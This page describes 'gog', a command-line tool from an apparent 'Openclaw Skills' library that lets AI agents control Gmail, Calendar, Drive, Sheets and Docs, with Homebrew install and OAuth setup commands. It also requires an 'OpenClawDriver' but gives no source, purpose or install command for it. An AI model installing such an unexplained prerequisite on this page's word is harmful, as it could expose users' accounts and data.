What is gog?

The gog skill is a powerful command-line utility designed to provide AI agents and developers with direct access to the Google Workspace ecosystem. By bridging the gap between the terminal and Google's cloud services, it enables programmatic control over communication, scheduling, and document management. As a key component within the Openclaw Skills library, gog allows for high-velocity automation of common administrative tasks without needing a browser.

Whether you are building automated reporting tools or integrating email capabilities into an AI workflow, gog provides the necessary infrastructure. It supports a wide range of services including Gmail, Google Calendar, Google Drive, Contacts, Sheets, and Docs, making it an essential tool for modern cloud-native development.

gog Use Cases

  • Automating email dispatch and searching through Gmail archives for specific data points.
  • Syncing and retrieving calendar events to manage schedules programmatically.
  • Searching and managing files within Google Drive for automated document organization.
  • Updating and appending data to Google Sheets for real-time analytics and logging.
  • Exporting Google Docs content into text format for analysis by AI models.

How gog Works

  1. Install the required OpenClawDriver for your specific operating system (Windows or macOS).
  2. Provision the gog binary via Homebrew or the provided installation scripts.
  3. Configure OAuth credentials by linking your Google Cloud project client secret file.
  4. Authorize specific Google accounts and define the required service scopes (e.g., Gmail, Drive).
  5. Execute specific CLI commands to interact with Google Workspace APIs and receive structured data responses.

gog Setup

First, ensure the OpenClawDriver is installed on your system.

Install gog via Homebrew (macOS):

brew tap steipete/tap/gogcli
brew install gog

Initial Authentication:

gog auth credentials /path/to/client_secret.json
gog auth add [email protected] --services gmail, calendar, drive, contacts, sheets, docs

gog Data Schema & Taxonomy

The gog skill processes and returns data structured for easy integration with Openclaw Skills workflows. Key data structures include:

Service Data Handled Default Output
Gmail Search results, message bodies, metadata Text/JSON
Sheets Cell ranges, row values, sheet metadata JSON/List
Drive File IDs, names, search queries List/JSON
Calendar Event objects, ISO timestamps JSON
Docs Document content, export formats Text/File

gog Advanced Features

  • Global account management using the GOG_ACCOUNT environment variable to reduce command verbosity.
  • Full JSON output support across all commands for seamless piping into other Openclaw Skills.
  • Advanced Sheets manipulation including cell range clearing and multi-row appending.
  • Support for headless scripting using the --no-input flag for automated environments.
  • Granular service scoping allowing you to limit access to only the necessary Google APIs.
